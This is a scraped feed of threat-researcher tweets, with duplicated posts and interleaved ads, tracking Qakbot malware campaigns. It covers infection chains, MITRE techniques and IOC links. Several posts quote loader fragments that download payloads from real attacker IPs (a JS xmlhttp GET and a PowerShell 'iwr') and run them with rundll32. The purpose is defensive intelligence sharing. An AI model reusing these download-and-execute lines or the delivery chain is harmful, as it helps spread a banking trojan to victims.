reecDeep(@reecdeep) 's Twitter Profile Photo

JS loader it's ingenious!
Uses an old technique for creating 2 scripts starting from the position of the letters in the
AudioRecordingDiagnostic.xml system file:
1⃣ 2nd stage downloader
2⃣ 2nd stage exec
⚠️ low detection!

twitter.com/Cryptolaemus1/…

#Qakbot #malware JS loader it's ingenious!
Uses an old technique for creating 2 scripts starting from the position of the letters in the 
AudioRecordingDiagnostic.xml system file:
1⃣ 2nd stage downloader
2⃣ 2nd stage exec
⚠️ low detection!
#infosecurity 
twitter.com/Cryptolaemus1/…
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- BB30 - .pdf > url > .zip > .js > .dll

wscript.exe document_D031_Jun_1.js

conhost.exe conhost.exe conhost.exe rundll32.exe C:\Users\Public\unhandled.dat,next

IOC's
github.com/pr0xylife/Qakb…

#Qakbot - BB30 - .pdf > url > .zip > .js > .dll

wscript.exe document_D031_Jun_1.js

conhost.exe conhost.exe conhost.exe rundll32.exe C:\Users\Public\unhandled.dat,next

IOC's
github.com/pr0xylife/Qakb…
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- obama264 - .pdf > .zip > .wsf > xmlhttp > .dll

wscript.exe Claim_C736.wsf

var u = 'http://45.76.58.]72/a0UFMZnC6ltxphw.dat'
http.open('GET', u[i], false)

conhost.exe rundll32.exe C:\Users\Public\amLE5PKlGAXrhpU.dat,bind

IOC's
github.com/pr0xylife/Qakb…

#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll

wscript.exe Claim_C736.wsf

var u = 'http://45.76.58.]72/a0UFMZnC6ltxphw.dat'
http.open('GET', u[i], false)

conhost.exe rundll32.exe C:\Users\Public\amLE5PKlGAXrhpU.dat,bind

IOC's
github.com/pr0xylife/Qakb…
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- BB30 - .pdf > url > .zip > .js > .dll

wscript.exe doc_C302_May_31.js

conhost.exe conhost.exe conhost.exe rundll32.exe C:\Users\Public\photographed.dat,next

IOC's
github.com/pr0xylife/Qakb…

#Qakbot - BB30 - .pdf > url > .zip > .js > .dll

wscript.exe doc_C302_May_31.js

conhost.exe conhost.exe conhost.exe rundll32.exe C:\Users\Public\photographed.dat,next

IOC's
github.com/pr0xylife/Qakb…
account_circle
Mangusta(@Tac_Mangusta) 's Twitter Profile Photo

reuse dropper URL from the campaign observed yesterday 🇮🇹

e.g: s://aandainternational.]com/qd/?4595731

30/05 > doc_*_May_30.js
31/05 > doc_*_May_31.js

#Qakbot reuse dropper URL from the campaign observed yesterday 🇮🇹

e.g: s://aandainternational.]com/qd/?4595731

30/05 > doc_*_May_30.js
31/05 > doc_*_May_31.js
account_circle
Chris(@phage_nz) 's Twitter Profile Photo

Qakbot (Obama266). Thread hijacking. Adobe Acrobat browser plugin lure. PDF attachment > ZIP (geofenced) via assurancetp[.]com/iebcqyhjfa/iebcqyhjfa.zip > JS > MSI via tofinka[.]com/ud75yj.msi > DLL. ZIP sample: tria.ge/230601-2bsa2ah…

Qakbot (Obama266). Thread hijacking. Adobe Acrobat browser plugin lure. PDF attachment > ZIP (geofenced) via assurancetp[.]com/iebcqyhjfa/iebcqyhjfa.zip > JS > MSI via tofinka[.]com/ud75yj.msi > DLL. ZIP sample: tria.ge/230601-2bsa2ah…
account_circle
Max_Malyutin(@Max_Mal_) 's Twitter Profile Photo

MSI Fake Adobe Plugin Infection 🚨

[+] Msiexec T1218.007: Fake Adobe .msi
[+] Rundll32 T1218.011: Export func 'next'

[+] Process Hollowing T1055.012: Target process wermgr.exe (new RWX page contains DLL loader)
[+] Loader Internal Name: HNetCfgClient.dll 🔥

#Qakbot MSI Fake Adobe Plugin Infection #TTPs 🚨

[+] Msiexec T1218.007: Fake Adobe .msi
[+] Rundll32 T1218.011: Export func 'next'

[+] Process Hollowing T1055.012: Target process wermgr.exe (new RWX page contains DLL loader)
[+] Loader Internal Name: HNetCfgClient.dll 🔥
account_circle
ChatGod.ai(@Chatgodai) 's Twitter Profile Photo

Find answers and solutions with artificial intelligence using ChatGPT and other AI systems to enhance your knowledge.

For more information about the bot and its capabilities, click the button.

account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- BB29 - pdf > .url > .js > ps > .dll

wscript objectively.js

powershell $meth = http://151.236.22.]142/mQpWA8n/kxyj5'

foreach ($Pre in $meth) try {$m = FromBase64($Pre);

iwr $man -O C:\ProgramData\taco

rundll32 C:\ProgramData\taco,bind

IOC's
github.com/pr0xylife/Qakb…

#Qakbot - BB29 - pdf > .url > .js > ps > .dll

wscript objectively.js

powershell $meth = http://151.236.22.]142/mQpWA8n/kxyj5'

foreach ($Pre in $meth) try {$m = FromBase64($Pre);

iwr $man -O C:\ProgramData\taco

rundll32 C:\ProgramData\taco,bind

IOC's
github.com/pr0xylife/Qakb…
account_circle
Zscaler ThreatLabz(@Threatlabz) 's Twitter Profile Photo

🤖Check out our technical analysis of including the anti-analysis techniques, encryption algorithms, and similarities with Qakbot: zscaler.com/blogs/security…

IOCs are available here: github.com/threatlabz/ioc…

🤖Check out our technical analysis of #Pikabot including the anti-analysis techniques, encryption algorithms, and similarities with Qakbot: zscaler.com/blogs/security…

IOCs are available here: github.com/threatlabz/ioc…
account_circle
Black Lotus Labs(@BlackLotusLabs) 's Twitter Profile Photo

Black Lotus Labs is here for you with new research on . We look into their network structure, reveal what makes them so resilient, and describe the cycle of life for their bots and C2s

Black Lotus Labs is here for you with new research on #Qakbot. We look into their network structure, reveal what makes them so resilient, and describe the cycle of life for their bots and C2s

account_circle
QuillBot(@TheQuillBot) 's Twitter Profile Photo

Write in clear, mistake-free English with QuillBot.

Join over 50+ million QuillBot users and see what better, clearer writing can do for you.

Try for Free Now!

account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- obama265 - .pdf > .zip > .msi > .dll

wscript.exe AgreementCancellation 1337 May 30.js'

msiexec.exe /V

rundll32.exe C:\Users\Admin\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next

IOC's
github.com/pr0xylife/Qakb…

#Qakbot - obama265 - .pdf > .zip > .msi > .dll

wscript.exe AgreementCancellation 1337 May 30.js'

msiexec.exe /V

rundll32.exe C:\Users\Admin\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next

IOC's
github.com/pr0xylife/Qakb…
account_circle
Roland Zigerli(@BigZiii) 's Twitter Profile Photo

.FortiGuard Labs discovered a campaign spreading a new variant of the information stealer and banking Trojan .

Read our analysis blog to learn how the HTML file can lead to executing the QakBot variant, what actions it takes, and more: ftnt.net/6010OtDqC

.@FortiGuardLabs discovered a #phishing campaign spreading a new variant of the information stealer and banking Trojan #QakBot. 

Read our analysis blog to learn how the HTML file can lead to executing the QakBot variant, what actions it takes, and more: ftnt.net/6010OtDqC
account_circle
ACE Responder(@ACEResponder) 's Twitter Profile Photo

✉️ An example of -esque HTML smuggling.

The .wsf payload is delivered in an <a> tag which is downloaded and executed by the victim.

account_circle